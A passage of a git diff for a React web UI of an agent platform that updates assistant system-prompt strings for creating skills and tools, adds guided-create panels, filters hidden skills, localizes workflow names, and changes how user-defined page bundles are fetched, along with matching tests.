-      expect(screen.getByText('AI 编辑')).toBeInTheDocument();
+      expect(screen.getByText('工作台')).toBeInTheDocument();
     });
   });
 
diff --git a/webui/src/pages/Skill/SkillSheet.tsx b/webui/src/pages/Skill/SkillSheet.tsx
index a96d79510..b11665c36 100644
--- a/webui/src/pages/Skill/SkillSheet.tsx
+++ b/webui/src/pages/Skill/SkillSheet.tsx
@@ -7,13 +7,15 @@
  * - Rex chat mode (natural language → extract config into form)
  */
 
-import { useState } from 'react';
+import { useMemo, useState } from 'react';
 import { useTranslation } from 'react-i18next';
 import { BookOpen, Lock, Pencil, Eye, Save, Loader2, Trash2 } from 'lucide-react';
 import ReactMarkdown from 'react-markdown';
 import { skillAPI, Skill } from '@/api/skill';
 import { useToast } from '@/components/common/Toast';
 import EntitySheet from '@/components/common/EntitySheet';
+import { buildGuidedCreateGroups } from '@/components/common/GuidedCreatePanel';
+import { useRexComposerControls } from '@/components/common/useRexComposerControls';
 
 interface SkillFormData {
   name: string;
@@ -25,7 +27,7 @@ function buildRexContext(isEdit: boolean, formData: SkillFormData): string {
   if (!isEdit) {
     return `你是 Skill 创建助手。用户希望通过对话来创建一个新的 Skill。
 
-请使用 skill-builder skill 根据用户需求完成创建，产物写入 ~/.flocks/plugins/skills/<skill-name>/ 目录。
+请先加载并遵守项目内 .flocks/plugins/skills/skill-builder（skill-builder skill），再根据用户需求完成创建，产物写入 ~/.flocks/plugins/skills/<skill-name>/ 目录。
 
 **创建流程：**
 1. 先确认用户需求：Skill 名称（kebab-case）、描述、主要功能、作用域（用户/global 或项目）
@@ -33,8 +35,9 @@ function buildRexContext(isEdit: boolean, formData: SkillFormData): string {
 3. 执行 skill 要求的验证，确保 skill 可被系统发现
 
 **重要约束：**
-- 必须先加载 skill-builder skill，再动手写文件
+- 必须先加载 .flocks/plugins/skills/skill-builder，再动手写文件
 - 禁止写到 .flocks/skills/ 等内置 skill 目录
+- 默认写入 ~/.flocks/plugins/skills/<skill-name>/，除非用户明确要求项目级路径
 
 请先引导用户描述需求，信息不足时可追问，然后按 skill 一次性完成创建。`;
   }
@@ -100,6 +103,11 @@ export default function SkillSheet({ skill, onClose, onSaved, onDeleted }: Skill
   const [deleting, setDeleting] = useState(false);
   // Toggle between edit (textarea) and preview (Markdown render) for the content area
   const [contentEditing, setContentEditing] = useState(false);
+  const createGuideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.guideSectionTitle'), actions: t('create.guideActions', { returnObjects: true }) },
+    { title: t('create.caseSectionTitle'), actions: t('create.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const rexComposerControls = useRexComposerControls();
 
   const canSubmit = !isReadonly && (formData.name && formData.description && formData.content);
 
@@ -174,12 +182,16 @@ export default function SkillSheet({ skill, onClose, onSaved, onDeleted }: Skill
       icon={<BookOpen className="w-5 h-5" />}
       rexSystemContext={buildRexContext(isEdit, formData)}
       rexWelcomeMessage={buildRexWelcome(isEdit, skill?.name)}
+      rexGuideGroups={!isEdit ? createGuideGroups : undefined}
+      rexGuidePanelTitle={!isEdit ? t('create.guidePanelTitle') : undefined}
+      rexGuidePanelDesc={!isEdit ? t('create.guidePanelDesc') : undefined}
+      rexGuideEmptyTitle={!isEdit ? t('create.emptyStateTitle') : undefined}
+      rexGuideIcon={!isEdit ? <BookOpen className="h-5 w-5" /> : undefined}
+      {...(!isEdit ? rexComposerControls : {})}
       submitDisabled={!canSubmit}
       submitLoading={loading}
       submitLabel={isReadonly ? t('sheet.submitClose') : undefined}
       hideForm={!isEdit}
-      width={700}
-      maxWidth={900}
       onClose={onClose}
       onSubmit={handleSubmit}
       footerLeft={isEdit ? (
@@ -340,4 +352,4 @@ export default function SkillSheet({ skill, onClose, onSaved, onDeleted }: Skill
       </div>
     </EntitySheet>
   );
-}
\ No newline at end of file
+}
diff --git a/webui/src/pages/Skill/index.test.tsx b/webui/src/pages/Skill/index.test.tsx
index 5bea08b7f..32bfeabd2 100644
--- a/webui/src/pages/Skill/index.test.tsx
+++ b/webui/src/pages/Skill/index.test.tsx
@@ -75,6 +75,13 @@ function makeSkill(name: string) {
   };
 }
 
+function makeUiHiddenSkill(name: string) {
+  return {
+    ...makeSkill(name),
+    ui_hidden: true,
+  };
+}
+
 describe('SkillPage', () => {
   beforeEach(() => {
     vi.clearAllMocks();
@@ -105,4 +112,18 @@ describe('SkillPage', () => {
     expect(refreshMock).toHaveBeenCalledTimes(1);
     expect(toastErrorMock).not.toHaveBeenCalled();
   });
+
+  it('does not render UI-hidden internal skills', async () => {
+    statusMock.mockResolvedValue({
+      data: [makeSkill('visible-skill'), makeUiHiddenSkill('workflow-config-guide')],
+    });
+
+    render(<SkillPage />);
+
+    await waitFor(() => {
+      expect(screen.getByText('visible-skill')).toBeInTheDocument();
+    });
+
+    expect(screen.queryByText('workflow-config-guide')).not.toBeInTheDocument();
+  });
 });
diff --git a/webui/src/pages/Skill/index.tsx b/webui/src/pages/Skill/index.tsx
index df174be4b..f90f38c48 100644
--- a/webui/src/pages/Skill/index.tsx
+++ b/webui/src/pages/Skill/index.tsx
@@ -20,6 +20,7 @@ import LoadingSpinner from '@/components/common/LoadingSpinner';
 import EmptyState from '@/components/common/EmptyState';
 import { useToast } from '@/components/common/Toast';
 import { skillAPI, Skill } from '@/api/skill';
+import { EnabledBadge } from '@/pages/Tool/components/badges';
 import SkillSheet from './SkillSheet';
 import SkillInstallDialog from './SkillInstallDialog';
 
@@ -93,12 +94,12 @@ export default function SkillPage() {
     void fetchSkills();
   }, [fetchSkills]);
 
-  // Skills visible to this page: everything except the internal "system"
-  // category.  Counter chips operate on this set so the totals reflect
-  // what the user can actually see — search and statusFilter both narrow
-  // it further into ``filteredSkills``.
+  // Skills visible to this page: hide skills explicitly marked UI-hidden and
+  // the legacy "system" category. Counter chips operate on this set so the
+  // totals reflect what the user can actually see — search and statusFilter
+  // both narrow it further into ``filteredSkills``.
   const visibleSkills = useMemo(
-    () => skills.filter(s => s.category !== 'system'),
+    () => skills.filter(s => !s.ui_hidden && s.category !== 'system'),
     [skills],
   );
 
@@ -605,8 +606,8 @@ function SkillRow({ skill, isSelected, installingDeps, toggling, onSelect, onIns
   return (
     <tr
       className={`transition-colors ${
-        skill.disabled ? 'opacity-50' : 'hover:bg-gray-50'
-      } ${isSelected ? 'bg-slate-50' : ''}`}
+        skill.disabled ? 'bg-gray-50/40 dark:bg-zinc-900/30' : 'hover:bg-gray-50 dark:hover:bg-zinc-900/60'
+      } ${isSelected ? 'bg-slate-50 dark:bg-zinc-900/80' : ''}`}
     >
       {/* 类型列 */}
       <td className="px-4 py-3">
@@ -664,7 +665,7 @@ function SkillRow({ skill, isSelected, installingDeps, toggling, onSelect, onIns
 
       {/* 启用开关列：控制 skill 是否注入 Agent System Prompt */}
       <td className="px-4 py-3">
-        <ToggleSwitch
+        <SkillEnabledControl
           enabled={enabled}
           loading={toggling}
           title={enabled ? t('toggle.enabledTip') : t('toggle.disabledTip')}
@@ -709,7 +710,7 @@ function SkillRow({ skill, isSelected, installingDeps, toggling, onSelect, onIns
 
 // ─── Sub-components ───────────────────────────────────────────────────────────
 
-function ToggleSwitch({ enabled, loading, title, onChange }: {
+function SkillEnabledControl({ enabled, loading, title, onChange }: {
   enabled: boolean;
   loading: boolean;
   title?: string;
@@ -720,22 +721,18 @@ function ToggleSwitch({ enabled, loading, title, onChange }: {
       type="button"
       role="switch"
       aria-checked={enabled}
+      aria-label={title}
       onClick={onChange}
       disabled={loading}
       title={title}
-      className={`relative inline-flex h-5 w-9 shrink-0 items-center rounded-full border-2 border-transparent
-        transition-colors duration-150 focus:outline-none disabled:cursor-wait
-        ${enabled ? 'bg-slate-700' : 'bg-gray-200'}`}
+      className="relative inline-flex rounded-full transition-opacity focus:outline-none focus-visible:ring-2 focus-visible:ring-gray-300 focus-visible:ring-offset-2 disabled:cursor-wait disabled:opacity-75"
     >
-      {loading
-        ? <Loader2 className="absolute inset-0 m-auto w-3 h-3 text-white animate-spin" />
-        : (
-          <span className={`pointer-events-none inline-block h-4 w-4 rounded-full bg-white shadow
-            transform transition-transform duration-150
-            ${enabled ? 'translate-x-4' : 'translate-x-0'}`}
-          />
-        )
-      }
+      <EnabledBadge enabled={enabled} />
+      {loading && (
+        <span className="absolute inset-0 inline-flex items-center justify-center rounded-full bg-white/70 dark:bg-zinc-900/70">
+          <Loader2 className="w-3 h-3 animate-spin text-gray-500 dark:text-zinc-300" />
+        </span>
+      )}
     </button>
   );
 }
diff --git a/webui/src/pages/Task/TaskSheet.tsx b/webui/src/pages/Task/TaskSheet.tsx
index 780bbf52c..75d0792b7 100644
--- a/webui/src/pages/Task/TaskSheet.tsx
+++ b/webui/src/pages/Task/TaskSheet.tsx
@@ -21,6 +21,7 @@ import { describeCron, CRON_PRESETS, formatDuration, formatTime } from './helper
 import { agentAPI, Agent } from '@/api/agent';
 import { workflowAPI, Workflow } from '@/api/workflow';
 import { getAgentDisplayDescription } from '@/utils/agentDisplay';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 import { StatusBadge } from './components';
 
 // ─── Types ────────────────────────────────────────────────────────────────────
@@ -558,7 +559,7 @@ function TaskFormContent({
                 )}
                 {workflows.map((wf) => (
                   <option key={wf.id} value={wf.id}>
-                    {wf.name}{wf.description ? ` — ${wf.description.slice(0, 30)}${wf.description.length > 30 ? '…' : ''}` : ''}
+                    {getWorkflowDisplayName(wf, i18n.language)}{wf.description ? ` — ${wf.description.slice(0, 30)}${wf.description.length > 30 ? '…' : ''}` : ''}
                   </option>
                 ))}
               </select>
diff --git a/webui/src/pages/Tool/ToolSheets.tsx b/webui/src/pages/Tool/ToolSheets.tsx
index 5d7360cf2..5ba1bfff0 100644
--- a/webui/src/pages/Tool/ToolSheets.tsx
+++ b/webui/src/pages/Tool/ToolSheets.tsx
@@ -6,10 +6,12 @@
  * - GenerateToolSheet: AI 生成自定义工具
  */
 
-import { useState } from 'react';
+import { useMemo, useState } from 'react';
 import { useTranslation } from 'react-i18next';
 import { Database, Cloud, Code, Info, CheckCircle, XCircle, Activity, Wifi, WifiOff, Loader2 } from 'lucide-react';
 import EntitySheet from '@/components/common/EntitySheet';
+import { buildGuidedCreateGroups } from '@/components/common/GuidedCreatePanel';
+import { useRexComposerControls } from '@/components/common/useRexComposerControls';
 import client from '@/api/client';
 import { mcpAPI } from '@/api/mcp';
 
@@ -538,6 +540,11 @@ export function MCPFormFields({
 
 export function MCPSheet({ onClose, onSaved, onRefresh }: MCPSheetProps) {
   const { t } = useTranslation('tool');
+  const guideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.mcp.guideSectionTitle'), actions: t('create.mcp.guideActions', { returnObjects: true }) },
+    { title: t('create.mcp.caseSectionTitle'), actions: t('create.mcp.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const rexComposerControls = useRexComposerControls();
   const [formData, setFormData] = useState<MCPFormData>({
     name: '',
     connType: 'sse',
@@ -627,12 +634,18 @@ export function MCPSheet({ onClose, onSaved, onRefresh }: MCPSheetProps) {
       icon={<Database className="w-5 h-5" />}
       rexSystemContext={MCP_REX_CONTEXT}
       rexWelcomeMessage={MCP_REX_WELCOME}
+      rexGuideGroups={guideGroups}
+      rexGuidePanelTitle={t('create.mcp.guidePanelTitle')}
+      rexGuidePanelDesc={t('create.mcp.guidePanelDesc')}
+      rexGuideEmptyTitle={t('create.mcp.emptyStateTitle')}
+      rexGuideIcon={<Database className="h-5 w-5" />}
+      {...rexComposerControls}
       submitDisabled={!canSubmit}
       submitLoading={submitting}
       submitLabel={t('button.addService')}
       onClose={onClose}
       onSubmit={handleSubmit}
-      initialTab="form"
+      initialTab="rex"
     >
       <MCPFormFields
         formData={formData}
@@ -663,7 +676,7 @@ export function MCPSheet({ onClose, onSaved, onRefresh }: MCPSheetProps) {
 
 const API_REX_CONTEXT = `你是 API 工具接入助手。用户希望通过对话将外部 API 接入为 Flocks API工具。
 
-请使用 tool-builder skill 完成接入，所有产物写入 ~/.flocks/plugins/tools/api/ 目录。
+请先加载并遵守项目内 .flocks/plugins/skills/tool-builder（tool-builder skill）完成接入，所有产物写入 ~/.flocks/plugins/tools/api/ 目录。
 
 **接入流程：**
 1. 先确认 API 功能、Base URL、认证方式（API Key / Bearer 等）
@@ -672,7 +685,7 @@ const API_REX_CONTEXT = `你是 API 工具接入助手。用户希望通过对
 4. 创建后立即启用（enabled: true），确保工具在 Web UI 的 API 服务中可见
 
 **重要约束：**
-- 必须先加载 tool-builder skill，再动手写文件
+- 必须先加载 .flocks/plugins/skills/tool-builder，再动手写文件
 - 禁止写入 flocks/tool/、flocks/tool/generated/ 等项目源码路径
 - 复杂预处理/后处理使用 YAML-Script handler，仍放在 api/ 目录下
 
@@ -695,6 +708,11 @@ interface APISheetProps {
 
 export function APISheet({ onClose }: APISheetProps) {
   const { t } = useTranslation('tool');
+  const guideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.api.guideSectionTitle'), actions: t('create.api.guideActions', { returnObjects: true }) },
+    { title: t('create.api.caseSectionTitle'), actions: t('create.api.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const rexComposerControls = useRexComposerControls();
   const handleSubmit = () => {};
 
   return (
@@ -705,6 +723,12 @@ export function APISheet({ onClose }: APISheetProps) {
       icon={<Cloud className="w-5 h-5" />}
       rexSystemContext={API_REX_CONTEXT}
       rexWelcomeMessage={API_REX_WELCOME}
+      rexGuideGroups={guideGroups}
+      rexGuidePanelTitle={t('create.api.guidePanelTitle')}
+      rexGuidePanelDesc={t('create.api.guidePanelDesc')}
+      rexGuideEmptyTitle={t('create.api.emptyStateTitle')}
+      rexGuideIcon={<Cloud className="h-5 w-5" />}
+      {...rexComposerControls}
       submitDisabled
       submitLabel={t('button.submitToRex')}
       onClose={onClose}
@@ -721,7 +745,7 @@ export function APISheet({ onClose }: APISheetProps) {
 
 const GENERATE_REX_CONTEXT = `你是工具创建助手。用户希望通过对话创建一个新的 Flocks python工具。
 
-请使用 tool-builder skill 根据用户需求完成工具创建，所有产物写入 ~/.flocks/plugins/tools/python 目录。
+请先加载并遵守项目内 .flocks/plugins/skills/tool-builder（tool-builder skill），再根据用户需求完成工具创建，所有产物写入 ~/.flocks/plugins/tools/python 目录。
 
 **创建流程：**
 1. 先确认用户需求：工具名称、功能、输入输出、是否为外部 API 集成
@@ -730,7 +754,7 @@ const GENERATE_REX_CONTEXT = `你是工具创建助手。用户希望通过对
 4. 创建后立即启用，确保工具可用
 
 **重要约束：**
-- 必须先加载 tool-builder skill，再动手写文件
+- 必须先加载 .flocks/plugins/skills/tool-builder，再动手写文件
 - 禁止写入 flocks/tool/、flocks/tool/generated/ 等项目源码路径
 - 外部 API 集成必须提醒用户使用“添加 API”，创建工具默认指 python 工具
 
@@ -751,6 +775,11 @@ interface GenerateToolSheetProps {
 
 export function GenerateToolSheet({ onClose }: GenerateToolSheetProps) {
   const { t } = useTranslation('tool');
+  const guideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.local.guideSectionTitle'), actions: t('create.local.guideActions', { returnObjects: true }) },
+    { title: t('create.local.caseSectionTitle'), actions: t('create.local.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const rexComposerControls = useRexComposerControls();
   const handleSubmit = () => {
     onClose();
   };
@@ -763,9 +792,16 @@ export function GenerateToolSheet({ onClose }: GenerateToolSheetProps) {
       icon={<Code className="w-5 h-5" />}
       rexSystemContext={GENERATE_REX_CONTEXT}
       rexWelcomeMessage={GENERATE_REX_WELCOME}
+      rexGuideGroups={guideGroups}
+      rexGuidePanelTitle={t('create.local.guidePanelTitle')}
+      rexGuidePanelDesc={t('create.local.guidePanelDesc')}
+      rexGuideEmptyTitle={t('create.local.emptyStateTitle')}
+      rexGuideIcon={<Code className="h-5 w-5" />}
+      {...rexComposerControls}
       submitLabel={t('sheet.doneLabel')}
       onClose={onClose}
       onSubmit={handleSubmit}
+      hideForm
     >
       <div className="flex flex-col items-center justify-center py-12 gap-4 text-center">
         <div className="w-16 h-16 rounded-2xl bg-red-50 flex items-center justify-center">
diff --git a/webui/src/pages/UserDefinedPageHost/index.test.tsx b/webui/src/pages/UserDefinedPageHost/index.test.tsx
index 6bf88c148..3f95164ce 100644
--- a/webui/src/pages/UserDefinedPageHost/index.test.tsx
+++ b/webui/src/pages/UserDefinedPageHost/index.test.tsx
@@ -16,6 +16,10 @@ vi.mock('@/api/userDefinedPages', () => ({
   },
 }));
 
+vi.mock('@/api/client', () => ({
+  getApiBase: () => 'https://api.example.test',
+}));
+
 vi.mock('./runtime', () => ({
   installUserDefinedPageRuntime: installMock,
   loadUserDefinedPageBundle: loadBundleMock,
@@ -83,6 +87,10 @@ describe('UserDefinedPageHost', () => {
       expect(screen.getByText('自定义页面内容')).toBeInTheDocument();
     });
     expect(installMock).toHaveBeenCalledWith('dash-1');
+    expect(loadBundleMock).toHaveBeenCalledWith(
+      'https://api.example.test/api/user-defined-pages/dash-1/bundle.js?v=abc123',
+      'host.bundleMissingExport',
+    );
   });
 
   it('shows build error when bundle is not ready', async () => {
diff --git a/webui/src/pages/UserDefinedPageHost/index.tsx b/webui/src/pages/UserDefinedPageHost/index.tsx
index c6e532543..a30cfce6f 100644
--- a/webui/src/pages/UserDefinedPageHost/index.tsx
+++ b/webui/src/pages/UserDefinedPageHost/index.tsx
@@ -76,7 +76,7 @@ export default function UserDefinedPageHost() {
     if (!pageId || !hash) return;
     installUserDefinedPageRuntime(pageId);
     const base = getApiBase();
-    const url = `${base}/api/user-defined-pages/${pageId}/bundle.js?v=${encodeURIComponent(hash)}`;
+    const url = `${base}/api/user-defined-pages/${encodeURIComponent(pageId)}/bundle.js?v=${encodeURIComponent(hash)}`;
     const component = await loadUserDefinedPageBundle(url, tr('host.bundleMissingExport'));
     setPageComponent(() => component);
     setError(null);
diff --git a/webui/src/pages/UserDefinedPageHost/runtime.test.tsx b/webui/src/pages/UserDefinedPageHost/runtime.test.tsx
index 0439ba26b..cce4b5c57 100644
--- a/webui/src/pages/UserDefinedPageHost/runtime.test.tsx
+++ b/webui/src/pages/UserDefinedPageHost/runtime.test.tsx
@@ -1,6 +1,6 @@
 import { describe, expect, it, vi } from 'vitest';
 import apiClient from '@/api/client';
-import { installUserDefinedPageRuntime } from './runtime';
+import { installUserDefinedPageRuntime, loadUserDefinedPageBundle } from './runtime';
 
 describe('UserDefinedPage runtime', () => {
   it('exposes page-scoped api helper', async () => {
@@ -12,4 +12,30 @@ describe('UserDefinedPage runtime', () => {
     expect(getSpy).toHaveBeenCalledWith('/api/user-defined-pages/dash-1/api/stats', undefined);
     getSpy.mockRestore();
   });
+
+  it('loads page bundles through the credentialed api client', async () => {
+    const source = 'export default function Page(){return null;}';
+    const getSpy = vi.spyOn(apiClient, 'get').mockResolvedValue({ data: source } as never);
+    const createObjectURLSpy = vi
+      .spyOn(URL, 'createObjectURL')
+      .mockReturnValue(`data:text/javascript,${encodeURIComponent(source)}`);
+    const revokeObjectURLSpy = vi.spyOn(URL, 'revokeObjectURL').mockImplementation(() => {});
+
+    const component = await loadUserDefinedPageBundle(
+      'https://api.example.test/api/user-defined-pages/dash-1/bundle.js?v=abc123',
+      'missing default',
+    );
+
+    expect(component).toEqual(expect.any(Function));
+    expect(getSpy).toHaveBeenCalledWith(
+      'https://api.example.test/api/user-defined-pages/dash-1/bundle.js?v=abc123',
+      { responseType: 'text' },
+    );
+    expect(createObjectURLSpy).toHaveBeenCalledWith(expect.any(Blob));
+    expect(revokeObjectURLSpy).toHaveBeenCalledWith(expect.stringContaining('data:text/javascript'));
+
+    getSpy.mockRestore();
+    createObjectURLSpy.mockRestore();
+    revokeObjectURLSpy.mockRestore();
+  });
 });
diff --git a/webui/src/pages/UserDefinedPageHost/runtime.tsx b/webui/src/pages/UserDefinedPageHost/runtime.tsx
index 1e1aebbc9..6a0610f78 100644
--- a/webui/src/pages/UserDefinedPageHost/runtime.tsx
+++ b/webui/src/pages/UserDefinedPageHost/runtime.tsx
@@ -89,10 +89,18 @@ export async function loadUserDefinedPageBundle(
   url: string,
   missingExportMessage = 'Page bundle does not export a default component',
 ): Promise<ComponentType> {
-  const mod = await import(/* @vite-ignore */ url);
-  const component = mod.default as ComponentType | undefined;
-  if (!component) {
-    throw new Error(missingExportMessage);
+  const response = await apiClient.get<string>(url, { responseType: 'text' });
+  const source = typeof response.data === 'string' ? response.data : String(response.data ?? '');
+  const moduleUrl = URL.createObjectURL(new Blob([source], { type: 'application/javascript' }));
+
+  try {
+    const mod = await import(/* @vite-ignore */ moduleUrl);
+    const component = mod.default as ComponentType | undefined;
+    if (!component) {
+      throw new Error(missingExportMessage);
+    }
+    return component;
+  } finally {
+    URL.revokeObjectURL(moduleUrl);
   }
-  return component;
 }
diff --git a/webui/src/pages/Workflow/index.test.tsx b/webui/src/pages/Workflow/index.test.tsx
index 72303f7c1..9b0c06551 100644
--- a/webui/src/pages/Workflow/index.test.tsx
+++ b/webui/src/pages/Workflow/index.test.tsx
@@ -1,11 +1,13 @@
 import type { ReactNode } from 'react';
 import { describe, it, expect, vi, beforeEach } from 'vitest';
 import { render, screen, within } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
 import WorkflowPage from './index';
 
-const { mockNavigate, mockUseWorkflows } = vi.hoisted(() => ({
+const { mockNavigate, mockUseWorkflows, mockLanguage } = vi.hoisted(() => ({
   mockNavigate: vi.fn(),
   mockUseWorkflows: vi.fn(),
+  mockLanguage: { current: 'zh-CN' },
 }));
 
 vi.mock('react-router-dom', () => ({
@@ -27,6 +29,7 @@ vi.mock('react-i18next', () => ({
       };
       return translations[key] ?? key;
     },
+    i18n: { language: mockLanguage.current },
   }),
 }));
 
@@ -84,6 +87,7 @@ function makeWorkflow(overrides: Partial<any> = {}) {
 describe('WorkflowPage', () => {
   beforeEach(() => {
     vi.clearAllMocks();
+    mockLanguage.current = 'zh-CN';
     mockUseWorkflows.mockReturnValue({
       workflows: [],
       loading: false,
@@ -114,6 +118,68 @@ describe('WorkflowPage', () => {
     expect(within(builtinRegion).queryByText('Global Workflow')).not.toBeInTheDocument();
   });
 
+  it('按当前语言展示本地化工作流名称', () => {
+    // beforeEach resets the mocked i18n language to zh-CN, so the card is expected
+    // to show the zh-CN entry of nameI18n
+    // rather than the raw `name` field.
+    const localizedWorkflow = makeWorkflow({
+      id: 'wf-localized',
+      name: 'localized_workflow',
+      source: 'global',
+      nameI18n: { 'zh-CN': '中文工作流', 'en-US': 'English Workflow' },
+    });
+
+    mockUseWorkflows.mockReturnValue({
+      workflows: [localizedWorkflow],
+      loading: false,
+      error: null,
+      refetch: vi.fn(),
+    });
+
+    render(<WorkflowPage />);
+
+    expect(screen.getByText('中文工作流')).toBeInTheDocument();
+    expect(screen.queryByText('localized_workflow')).not.toBeInTheDocument();
+  });
+
+  it('从创建入口进入时显式开启新建草稿', async () => {
+    // Clicks the first two buttons matching the create label and checks that each
+    // click navigates to the create route with explicit fresh-create router state.
+    const user = userEvent.setup();
+    mockUseWorkflows.mockReturnValue({
+      workflows: [],
+      loading: false,
+      error: null,
+      refetch: vi.fn(),
+    });
+
+    // Shared matcher: navigation options must carry the flag and a numeric timestamp.
+    const freshCreateOptions = expect.objectContaining({
+      state: expect.objectContaining({
+        freshCreate: true,
+        ts: expect.any(Number),
+      }),
+    });
+
+    render(<WorkflowPage />);
+
+    const [firstCreateButton, secondCreateButton] = screen.getAllByRole('button', {
+      name: /创建工作流/,
+    });
+    await user.click(firstCreateButton);
+    await user.click(secondCreateButton);
+
+    expect(mockNavigate).toHaveBeenCalledTimes(2);
+    // toHaveBeenNthCalledWith counts calls starting at 1.
+    for (const callIndex of [1, 2]) {
+      expect(mockNavigate).toHaveBeenNthCalledWith(
+        callIndex,
+        '/workflows/new',
+        freshCreateOptions,
+      );
+    }
+  });
+
   it('没有自定义工作流时不渲染空分组', () => {
     mockUseWorkflows.mockReturnValue({
       workflows: [makeWorkflow({ id: 'wf-project-only', name: 'Project Only', source: 'project' })],
diff --git a/webui/src/pages/Workflow/index.tsx b/webui/src/pages/Workflow/index.tsx
index 1de6c412b..330c183a1 100644
--- a/webui/src/pages/Workflow/index.tsx
+++ b/webui/src/pages/Workflow/index.tsx
@@ -15,6 +15,7 @@ import LoadingSpinner from '@/components/common/LoadingSpinner';
 import EmptyState from '@/components/common/EmptyState';
 import { useWorkflows } from '@/hooks/useWorkflow';
 import { Workflow } from '@/api/workflow';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 // ---------------------------------------------------------------------------
 // Color helpers (mirrors Agent page)
@@ -72,6 +73,15 @@ export default function WorkflowPage() {
   const [refreshDone, setRefreshDone] = useState(false);
   const [sourceFilter, setSourceFilter] = useState<SourceFilter>('all');
 
+  // Navigates to the workflow creation route, flagging the navigation as a
+  // fresh create via router state. `ts` records when the button was clicked
+  // (presumably so the target page can tell separate clicks apart — confirm).
+  const openFreshCreate = () => {
+    const freshCreateState = { freshCreate: true, ts: Date.now() };
+
+    navigate('/workflows/new', { state: freshCreateState });
+  };
+
   const builtinWorkflows = useMemo(() => workflows.filter(isBuiltin), [workflows]);
   const customWorkflows  = useMemo(() => workflows.filter(w => !isBuiltin(w)), [workflows]);
 
@@ -183,7 +193,7 @@ export default function WorkflowPage() {
             <RefreshCw className={`w-3.5 h-3.5 ${refreshing ? 'animate-spin' : ''}`} />
           </button>
           <button
-            onClick={() => navigate('/workflows/new')}
+            onClick={openFreshCreate}
             className="inline-flex items-center gap-1.5 px-3 py-1.5 bg-red-600 text-white rounded-lg hover:bg-red-700 transition-colors text-sm"
           >
             <Plus className="w-4 h-4" />
@@ -204,7 +214,7 @@ export default function WorkflowPage() {
             description={t('emptyState.description')}
             action={
               <button
-                onClick={() => navigate('/workflows/new')}
+                onClick={openFreshCreate}
                 className="inline-flex items-center gap-2 px-4 py-2 bg-red-600 text-white rounded-lg hover:bg-red-700"
               >
                 <Plus className="w-5 h-5" />
@@ -324,10 +334,11 @@ function WorkflowSection({
 // ---------------------------------------------------------------------------
 
 function WorkflowCard({ workflow }: { workflow: Workflow }) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const navigate = useNavigate();
   const color = resolveWorkflowColor(workflow);
   const builtin = isBuiltin(workflow);
+  const displayName = getWorkflowDisplayName(workflow, i18n?.language);
 
   const successRate =
     workflow.stats.callCount > 0
@@ -357,7 +368,7 @@ function WorkflowCard({ workflow }: { workflow: Workflow }) {
 
           <div className="min-w-0 flex-1">
             <span className="block text-sm font-semibold text-gray-900 truncate leading-snug">
-              {workflow.name}
+              {displayName}
             </span>
             <div className="flex items-center gap-1 mt-0.5 flex-wrap">
               {/* Source badge */}
diff --git a/webui/src/pages/WorkflowCreate/CreateChatTab.test.tsx b/webui/src/pages/WorkflowCreate/CreateChatTab.test.tsx
new file mode 100644
index 000000000..4e087639b
--- /dev/null
+++ b/webui/src/pages/WorkflowCreate/CreateChatTab.test.tsx
@@ -0,0 +1,421 @@
+import { act, render, screen, waitFor, within } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { MemoryRouter } from 'react-router-dom';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+import type { ComponentProps } from 'react';
+
+import CreateChatTab from './CreateChatTab';
+import { workflowAPI } from '@/api/workflow';
+
+const {
+  capturedSessionChatProps,
+  mockCreateAndSend,
+  mockSendPrompt,
+  mockSetSelectedModelKey,
+} = vi.hoisted(() => ({
+  capturedSessionChatProps: [] as any[],
+  mockCreateAndSend: vi.fn(),
+  mockSendPrompt: vi.fn(),
+  mockSetSelectedModelKey: vi.fn(),
+}));
+
+const selectedPromptModel = { providerID: 'provider-1', modelID: 'model-1' };
+const selectedModelOption = {
+  key: 'provider-1:model-1',
+  providerID: 'provider-1',
+  providerName: 'Provider',
+  modelID: 'model-1',
+  label: 'model-1',
+  pricingLabel: '',
+  contextLabel: '',
+  contextWindowTokens: 128000,
+  supportsVision: true,
+};
+
+vi.mock('@/hooks/useDefaultModelVision', () => ({
+  useDefaultModelVision: () => false,
+}));
+
+vi.mock('@/hooks/useSessionChat', () => ({
+  useSessionChat: (options: any) => ({
+    sessionId: options.initialSessionId ?? null,
+    error: null,
+    createAndSend: mockCreateAndSend,
+    retry: vi.fn(),
+  }),
+}));
+
+vi.mock('@/api/workflow', () => ({
+  workflowAPI: {
+    list: vi.fn().mockResolvedValue({ data: [] }),
+    get: vi.fn().mockResolvedValue({ data: null }),
+  },
+}));
+
+vi.mock('@/components/common/ChatPromptSelectors', () => ({
+  useChatAgentOptions: () => ({
+    agents: [{ name: 'rex', description: 'Rex', mode: 'primary', native: true }],
+    loading: false,
+  }),
+  useChatModelOptions: () => ({
+    groupedOptions: [],
+    loading: false,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey: mockSetSelectedModelKey,
+  }),
+  ChatAgentDisplay: ({ selectedAgent }: { selectedAgent: string }) => (
+    <div>Agent:{selectedAgent}</div>
+  ),
+  ChatModelPicker: () => <div>ModelPicker</div>,
+}));
+
+vi.mock('@/components/common/SessionChat', () => ({
+  buildInstructionDisplayText: (label: string) => `@@flocks-instruction:${label}`,
+  default: (props: any) => {
+    capturedSessionChatProps.push(props);
+    return (
+      <div data-testid="session-chat">
+        {typeof props.welcomeContent === 'function'
+          ? props.welcomeContent(vi.fn())
+          : props.welcomeContent}
+        {props.toolbarSlot}
+        {props.centerToolbarSlot}
+        {props.conversationBottomSlot?.({ sendPrompt: mockSendPrompt, sending: false })}
+      </div>
+    );
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, options?: Record<string, unknown>) => {
+      const translations: Record<string, any> = {
